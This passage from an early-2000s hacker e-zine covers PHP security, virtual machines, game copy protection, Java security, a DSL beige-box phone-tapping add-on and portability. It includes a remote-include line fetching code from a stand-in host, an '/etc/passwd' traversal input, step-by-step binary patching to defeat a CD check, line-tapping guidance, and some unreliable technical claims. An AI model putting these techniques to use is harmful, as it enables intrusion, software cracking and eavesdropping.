    This is my first GIF avatar !! Move your mouse Over Here !

Then when you move your mouse over that text, you will be redirected to that user's fake page with your cookie as an input to his script. He may have designed the script such that he gets an email whenever someone moves his mouse over that text, or it can be stored in a database. To prevent such attacks, you could use functions like htmlspecialchars() and strip_tags(). htmlspecialchars() will convert characters to their HTML equivalent entities; for example, < will be converted to &lt;. strip_tags() will strip all the PHP and HTML tags from a string. Look out for a wargame on XSS at hackingzone.org pretty soon. Maybe it's already there when you read this article ;)

4. Some other essential issues

You have to be very careful while you are using the system() and exec() functions of PHP.
If your script is not secure, someone can easily run an arbitrary command on the server. The escapeshellcmd() function should be used when you are passing user data to system() or exec(). Also, while using include() and fopen(), you really have to be awake!

    include("http://www.myfakesite.com/inme.php");

This way it makes it possible to inject arbitrary code into your file. Also, with fopen($userinput, 'r'), a user can input something like "../../../etc/passwd" and you know what's next ;)

While you are letting a user upload a file onto your server, the file gets uploaded into the temporary directory, but PHP doesn't check the validity of the directory name. You have to check whether the file is being uploaded to the proper path or not. Use the function "is_uploaded_file($filepath)".

I hope you like this article.

+11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111+

Virtual Machines: A Short Introduction
by Agni

This article describes in brief the concepts of simulation and virtual machines.

Simulation: a radical concept introduced way back in the 60's. It was the idea of making a program mimic the actual behaviour of a real-world thing. The real-world thing could be anything from a simple calculator to a complex car crash test lab. Programming languages like SmallTalk, C++ and (lately) JAVA have always been the best choice due to their support for OOP (I am not trying to undermine the mighty C language). OOP seems to naturally tend towards simulation.

Virtual Machines: a virtual machine is just what it says it is - a machine that isn't physically present. Hence a machine created through a program ("a simulation") is called a "virtual" machine. The one technique that has to be used when trying to build a VM is to study its real-world version thoroughly. Once all its critical aspects have been understood, building the virtual version should not be a difficult task.
In this case, however, we are not talking of a generic concept but a more particular one, where an application mimics (almost) the entire behaviour of the Intel 8085 microprocessor. Hence the politically correct term in this context would be a "virtual processor".

IBM (yes! Big Blue) introduced the concept of virtual processors way back in the 1970's to test new operating systems for its already up-and-running mainframes. Imagine a mainframe that is already deployed on a network and is catering to a few thousand terminals every minute. Now someone works days and nights building a brand new operating system for this monster so that it could run better. The major problem that the people running the mainframe would now face is: how do you deploy and test a new operating system on a mainframe that is already up and running and catering right now to a few thousand terminals (and here is the difficult part!) without shutting it down or troubling the connected terminals? Hmm! Now that seems to be something to think about..!

But then one of the guys came up with a plausible (although complicated) solution. The most essential thing that is needed to run a program is the CPU and the related hardware. If a test version of an operating system is run on the real hardware of a mainframe, it would most possibly make things go haywire. This meant that it was time for simulation to come to the rescue. If a program could be built that would exactly mimic the CPU (and maybe a few more hardware components, if needed) to start with, and the operating system were to be tested on "top" of it, it would just be another running program apart from the few other hundreds of usual programs that would be running on the mainframe.. right! Now even if something went wrong, this rogue program could be manually killed and restarted, without having to shut down the system or troubling the connected terminals. Presto! IBM had done it again!
The concept of simulation has helped technology make rapid strides: pilot training, car crash testing, nuclear explosions, architectural projects, futuristic microprocessors.. the list is endless. This is just the tip of the iceberg of what is possible with the concept of simulation. I hope this little article helps you to understand the concepts of simulation and virtual machines.

Author : AgNi
Contributing Member : HackingZone (e-zine)

+11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111+

Game Copy Protection
by Agni

Introduction

This article describes the techniques used in various recent computer games distributed on CDs to prevent piracy. In the present scenario, we can think of two ways in which a computer game on a CD can be "copied":

1. The contents of the original CD are "dumped" entirely onto a hard drive; the game is then activated from the hard drive.
2. The contents of the original CD are copied onto another CD with the help of a CD writer.

In this case, we talk of how to defend against case 1. Whether a truly secure solution exists for case 2 is arguable. However, at the moment, there are various mechanisms that exist to prevent case 2, as proposed by: http://www.macrovision.com/

We now proceed to understand the exact nature of the problem with case 1 and how game programmers deal with it. For the rest of the discussion, we assume the role of a game programmer who is developing the game in VC++ or VB code (which is usually the case for games distributed for PCs running "wingdows").

The Problem Description

In this section, we focus on the problem at hand as discussed previously. Let us assume that the game is completed and tested, and that the binary version in its entirety has been written onto a CD. We are now faced with this problem: what happens if the user copies the entire CD onto his PC's hard drive and starts the game from the hard drive?
In normal circumstances, the game is obviously going to execute, since it wouldn't make a damn difference to the game whether it was running from the hard drive or the CD drive!! It is now our duty to defend our hard work. But how do we do it?

Programmers with less experience (or who get too excited.. LOL) would suggest something like: "since the problem arises with the user copying the CD's contents onto a hard drive, why not prevent this copying operation?" Well, harsh reality clearly says that preventing copying this way is not feasible. Firstly, even if you write such code into your game, it must first be activated to give it a chance to prevent the copying from occurring. Why would the user activate it in the first place ;)? Even if it did get activated (maybe you put it in the taskbar, hence make it a "daemon"), the user could prevent it from running somehow. Other solutions might be writing the CD in a format that is not usually recognized by the operating system (this requires specifically tailored hardware, hence costly!). The silliest solution boils down to tweaking the operating system's shell to prevent it from providing access to the copy command at all! So, what then is the simplest solution?

The Light at the End of the Tunnel

The simplest way out is to let the user happily copy the CD's contents onto the hard drive, but somehow find out what sort of drive the currently active drive is once the game has been activated. As soon as the game is started, you try to find out whether the currently active drive is a CD drive (CD writers / CD-ROM drives / combo drives included). If it is not, then you simply abort the game from running further.
Now, I give you some sample code and some hints as to how this can be done on "wingdows":

    #include <windows.h>
    #include <stdio.h>
    #include <stdlib.h>

    #define CDDRIVE DRIVE_CDROM   /* value 5 in the win32 headers */

    void proceed_further(void)       { /* the game itself starts here */ }
    void display_error_message(void) { printf("Please run the game from the CD.\n"); }
    void abort_the_game(void)        { exit(1); }

    /* win32 api call: the directory the game was started from */
    void findcurrentpath(char *buf, DWORD len)
    {
        GetCurrentDirectoryA(len, buf);
    }

    /* GetDriveType wants a root such as "D:\", so build it from the first letter */
    void extractcurrentdriveletterfromcurrentpath(const char *path, char *root)
    {
        root[0] = path[0]; root[1] = ':'; root[2] = '\\'; root[3] = '\0';
    }

    /* win32 api call: 2 = removable, 3 = fixed disk, 5 = cd-rom */
    UINT checkforcurrentdrive(const char *root)
    {
        return GetDriveTypeA(root);
    }

    int main(void)
    {
        UINT drivetype;
        char currentpath[MAX_PATH];
        char currentdriveletter[4];

        //step 1 : run the current drive check
        findcurrentpath(currentpath, sizeof currentpath);
        extractcurrentdriveletterfromcurrentpath(currentpath, currentdriveletter);
        drivetype = checkforcurrentdrive(currentdriveletter);

        //step 2 :
        if (drivetype == CDDRIVE)
            proceed_further();
        else {
            display_error_message();
            abort_the_game();
        }
        return 0;
    }

NOTE : for "wingdows" programmers, the drive type for floppy drives is 2, for hard drives (or hard drive partitions) it is 3, and for CD-ROM types (writers / ROM / DVD / combo) it is 5. (Or was it 3 for CD-ROM types and 5 for hard drives and hard drive partitions ;)??)

Next, we move on to the BONUS section ;) of this article.. What sort of weaknesses does this mechanism have, and how can it be attacked? Well, firstly, anyone who wants to try and "deactivate" this defense must be well versed in assembly language, have a Pentium II or III manual, the VC++ IDE, lots of time and of course PATIENCE. So, assuming you do.. how would you go about this uphill task?

step 1 : learn to use the single-step mode in the VC++ IDE; this is extremely critical. You must also know how to set breakpoints in the program.

step 2 : plop the game CD into the CD drive (or copy it onto your hard drive) and open the main program using the VC++ IDE in binary mode (with single stepping turned on).

step 3 : observe carefully the code that was given previously. What would be the one step that needed to be "modified" a bit so it could let you play this game from the hard drive instead of the CD?
    //step 2 :
    if (drivetype == CDDRIVE)
        proceed_further();
    else {
        display_error_message();
        abort_the_game();
    }

As you can see above, it is that simple "if" condition that is the point of concern. Now, the gibberish you see when you open the game in binary mode from the VC++ IDE is the actual binary instructions as seen in assembly language instruction format. You know what the source code looks like, but you'll have to guess where this particular piece of code is located among the binary instructions in the game's executable. This is the place where you need to spend some time and have a lot of patience. Use breakpoints and single step through the program repeatedly, until you are quite sure that you have found the right place (where this if condition is hiding!!).

step 4 : dust off your Pentium manual ;), if you do have a printed version, or get one from http://www.intel.com.

step 5 : the "if" condition is usually implemented using the JMP instruction or its many variants. Look carefully in the manual for JMP and its variants, keeping an eye on what you suspect as the binary code of that "if" condition in the game's executable code.

NOTE : THIS NEEDS A LOT OF EXPERIENCE AND PATIENCE. DO NOT TRY THIS IF YOU LACK EXPERIENCE OR PATIENCE!

A typical implementation might look like this:

    //if condition
    CMP ah,5
    JNZ 02ef4      <-- this is the one you have to look out for !!
    ...
    ...
    //else condition (starting at offset 02ef4)
    ...
    ...

step 6 : this is the tricky one. You have to "modify" the instruction to render the "if" condition in the binary code ineffective. You could replace any conditional JMP instructions (or variants) that are the bytes of that "if" condition with unconditional JMP instructions. So to speak, now even if the code finds out that the current drive is not the CD drive type, it would still continue executing.. since the code has now been "modified" ;).

step 7 : save the program back to the hard drive.
Step out of the IDE and activate the program. If it works, hooray!! If it doesn't.. well, you have to consider giving it another shot. After all, attacking a security mechanism requires a lot of effort ;)!

For people who feel that this is a "how to crack copy protection mechanisms" article, please feel free to continue reading through the next section.

Fighting Back

So, given the fact that we now understand how to attack this kind of code, how can you as a game programmer provide strong security for your code in such a way that someone who tries to attack your copy protection mechanism finds the going difficult? I suggest some techniques below:

1. VC++ source code is vulnerable to such an attack, since it is quite straightforward. So, if you are indeed writing your game in VC++, try to introduce unnecessary complications into your source code (on purpose :p; I know you might argue "I write my code in a very efficient manner all the time" - just for this once.. take it easy :p :p). Do not have a simple if-else structure; put in a switch or extra function calls to throw the attacker off guard.

2. Write your game's main module code in VB. Since VB versions 5.0 on execute on top of the "VB virtual machine", the if-else condition you write is converted into pseudo code of some sort that is only understood by the VBVM. And due to this double level of complexity, it will make life very difficult for an attacker.

3. Write the CD drive checking code in a separate (little) program, then embed that program using the OLE container into your main game program. This is also another strong solution.

With this last section, I conclude this article. As you can see, I have taken an unbiased standpoint on the issue of security. As (wannabe) hackers, we think of ways and means to bend the rules, but on the other hand, we also have the responsibility to find out weaknesses in systems, so that they can be made stronger.
The issue of security is a never-ending war. Let the fireworks begin!!

Author : AgNi
E-zine Contributor
www.hackingzone.org

+11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111+

Java Security
by 0versight

There is not one single programming language that is 100% secure, but if I were ever to bet any money, it would be on Java. It is considered by many programmers to be the most secure language. It is not as powerful as C++ if you want to compare it to that language, but from the ground up it is more secure than the counterpart that I'm using.

The first line of defense is the structure of the Java Virtual Machine (JVM) itself. It is prohibited from having any direct access to hardware and any of the operating system architecture. Whenever the JVM starts loading untrusted code it goes through a process called byte-code verification. This makes sure that underflows or overflows of the JVM stack do not occur, hence Java is immune to buffer overflows. This is all information based on the latest Java Virtual Machine; in the past it was possible to execute a buffer overflow attack with the Netscape Navigator 4 browser. The process of byte-code verification was obviously built so that it won't crash and/or make your system vulnerable. It is currently very hard to make any kind of code that could potentially cause a buffer overflow attack, because the compiler that Sun provides denies this. There is also Borland's JBuilder and J++, which is made by Microsoft. If you can remember, there was an exploit for Microsoft's JVM at the end of last year. Microsoft's programmers failed to secure the compiler and the VM as well, which allowed attackers to make code that bypassed the byte-code verification. The exploit was known to bypass the check and reformat C.
For you or anyone to make any exploit or attack on the Java structure itself, you would pretty much have to do what Microsoft did: make your own compiler and have it allow or "ignore" any malicious code and execute it. A lot of people do not like working with Microsoft J++; the standard J2SDK that Sun provides is more than good enough. If you are diehard or want to see and make more powerful things with Java, you should look into JBuilder by Borland.

All code installed on the hard drive is granted full access by Java standards. Untrusted code is when you download an applet over the net. Untrusted does not mean it is malicious; it's just "new" to the computer and should be treated with caution. What Java does to treat untrusted code with "caution" is run it through the sandbox. The sandbox, in short, is a very restricted environment for Java code to run inside. The security manager is the basic default settings for how to manage and run Java code. When code installed on the HD is being run that, for example, checks for a certain file, it will check with the security manager whether it is allowed to do this, in this case checking for a certain file. Untrusted code, on the other hand, will be denied by the security manager from checking for any file on the hard drive.

The file that controls all this is simply called the policy class; it is "java.policy". If you have some basic knowledge of how Java works, you can open it with a text editor like kedit from the KDE suite or gedit from GNOME, and so on. You can edit what kind of actions you want Java to take when running a program, from denying certain actions to permitting them. Editing the policy is also possible through the Policy Tool that is included with the Java developer package. It is much easier to do it with the latter, but if you're feeling crazy, by all means play around with the text editor. Digital signatures also work with Java security to give you a more trusted relationship with unknown code.
If a browser or a Java-powered P2P client, for example, wants to have full/unrestricted access to your hard drive, then it would digitally sign the code to have such access. These are the main implementations of security for Java. This language was built with as much security as can be packed into it; Sun and other contributors try to cover every aspect possible, and it indeed works well.

+1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111+

   _____________________________________
  /                                    /
 /  A new addition to your Beige Box  /
/                                    /
\  by colt45                         \
 \ and wizbone                        \
  \_____________________________________\

[[[[[[[[[| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |]]]]]]]]]
[[[[[[[[[                                                                                         ]]]]]]]]]
[[[[[[[[[      This file was not brought to you by Telus.                                         ]]]]]]]]]
[[[[[[[[[      Bringing the technology of tomorrow to yesterday                                   ]]]]]]]]]
[[[[[[[[[      and selling it to today for twice as much.                                         ]]]]]]]]]
[[[[[[[[[                                                                                         ]]]]]]]]]
[[[[[[[[[| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | ]]]]]]]]]

With the outbreak of DSL, more and more people are giving up their dial-up connections for it. So with this in mind you need to update your beige box. When you subscribe to DSL, a high-frequency data signal is sent through your line on the same pair as your current voice service resides. DSL service requires special filters on the customer premises for a voice line and DSL service to coexist happily on the same pair. If you don't plan on climbing into someone's home to connect your beige box to their filter, you will hear a constant "beep........beep...boop" in the line. This makes conversations difficult.

A few notes on DSL

-Most DSL lines are run off of fax lines.
-There are two types of filters available for DSL: POTS splitters, and inline filters.
The inline filters are a simple box with an RJ11 port on one end, and a short (2-3") cord with an RJ11 crystal on the other. This type of filter is only for voice. For example, you get DSL on your fax line, so you plug your DSL mowdun (stands for mow-dalawn dun-dalawn) into the phone line, and your fax (aka "PH4CKS") into the inline filter, and then into the line. The only possible downfall of these types of filters is that the voice can potentially cause a small amount of interference with the DSL connection, but unless you have a terrible line, or a long run from your CO, you won't notice.

                             /
                            /
                            |        (1337 ASCii)
                            |   your mom's
                            |
[Telco]----telephone line---|-[demarc]-----[inline filter]--[ph4cks masheen]
                            |        \
                             \        \----[DSL mowdun]
                              \

The POTS splitter usually has three ports:

1. LINE, LINE-IN, or POTS -- This is where the phone line comes IN to the POTS splitter. (POTS stands for Plain Old Telephone System... I didn't name this shit, don't blame me).
2. PHONE -- This is where the voice channel is split out to. duh. Everything but .
3. MODEM, DSL -- The mowdun is plugged in through this port. Everything but DSL signals is filtered through this port.

                             /
                            /
                            |        (1337 ASCii)
                            |   your mom's
                            |                 ____________
                            |                [POTS FILTER ]
[Telco]----telephone line---|-[demarc]-------[ LINE       ]
                            |                [ PHONE      ]--[ph4cks masheen]
                            |                [ MOWDUN     ]----[DSL mowdun]
                             \               [____________]
                              \

The POTS splitter has its advantages because it can be installed at the demarc and doesn't require any extra ugly filters to hang out of your wall jacks. There's also the aforementioned potential for interference with the inline filters. Probably for the beige box, the inline filter would be ideal and very simple to modify for beiging use, while a POTS filter would be a lot more trouble to splice in properly. Plug your BB into the filter and then splice the filter onto the pair upon which the DSL service resides.
Your beige box will still work without the inline filter, but it will be harder to successfully social engineer your targets, especially operators, with all that line noise. But remember kids, beiging on private phone lines without prior permission is against the law, and soon reading this article will also be against the law. So be careful, and remember, only YOU can prevent forest fires.

`~12/23/02~`

+1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111+

Platform Independence: An Introduction
by Agni

This article describes in brief the concept of platform independence. Firstly, we have to try and understand one major problem faced by programmers worldwide until recently.

Programs are written in syntax particular to a programming language. This is called the source code. This code is then translated into binary using a translator program - a compiler or an interpreter. One thing must be clear at this stage: the translator "merely" translates the source code into bytes that are understood and executed by the processor on that machine. Also, the bytes must be arranged into a program format that is understood by the operating system running on that machine. The combination of the processor and operating system is called a "platform". What you must realise is that the translator itself satisfies the above-said conditions, since this translator itself runs on the same computer. Hence the translated output produced after compilation or interpretation (whatever the case) is a set of bytes that are very particularly restricted to the underlying platform.

Now, with that little explanation done, let us focus on the actual problem. How do you give the binary (executable) version of a program to someone and guarantee that it will execute as it is on that person's computer? What is the exact problem with this situation, you might wonder?
Well, there are not one but two problems that your program has to face!

*) Is this other computer using the same processor (or a compatible one) as the first computer (that the program was translated on)?
*) Is this other computer running the same operating system (or a compatible one) as the first computer (that the program was translated on)?

If the answer to any one of these questions is NO, the program will not run on the other computer. Mainly because (usually) two processors from different companies do not produce the same reaction given a set of bytes, since they have different instruction sets. Also, the program formats differ from one operating system to another. Hence, here comes the next point to be understood.

Portability: a critical term that has to be understood first before we move on to its "big brother" - platform independence. "Portable" refers to something that you can "carry around" without too much bother. Now, what we are talking about here is carrying around programs. If you still haven't understood what we are talking about, remember people talking of "porting a program to a platform" - what is that supposed to mean? Read on..

Porting (a.k.a. portability) is "talked" about at not one but two different levels:

*) Source Level: This is the easiest one. We define a language to be source-level portable if its source code can be recompiled (with maybe just a few little changes) on any given platform for which the corresponding translator is available. Remember, the translator itself has to satisfy some conditions (as mentioned above). Programming languages like C, C++ and JAVA satisfy this condition.
*) Binary Level: This is the tough one. For a long time, people thought this level of portability could never be achieved, until now. Once JAVA arrived on the scene, the rules of the game changed. JAVA had achieved the impossible, but then JAVA is not an ordinary player!
With all that said and done, let's try to get to the actual point of discussion. We define a language to be binary-level portable if its binary code (!) can be taken as it is (no changes permitted!) on to a platform and executed directly. This is possible only if there exists a certain "something" on the platform on which this program has to be executed. The compiler is not compulsory, but what is absolutely necessary is a virtual machine that makes it possible for the binary program to run directly. Programming languages like JAVA and Python fall into this category.

So in summary, platform independence is said to be achieved when the binary executable of a program can be executed without the necessity of recompiling the source code of the program on every one of the target platforms - this is also what is called "binary portability", as has been discussed above. I hope this little article helps you to understand the concepts of portability and platform independence.

Author : AgNi
Contributing Member : HackingZone (e-zine)

+10101010101010011111111110101010101010101010101001010101111010101000101001010000000001010111111110101001011010101001010101001010101010+
+1010101010101001111111111010101010101// END OF THE FIRST ISSUE //1111110101001011010101001010101001010101010+
+10101010101010011111111110101010101010101010101001010101111010101000101001010000000001010111111110101001011010101001010101001010101010+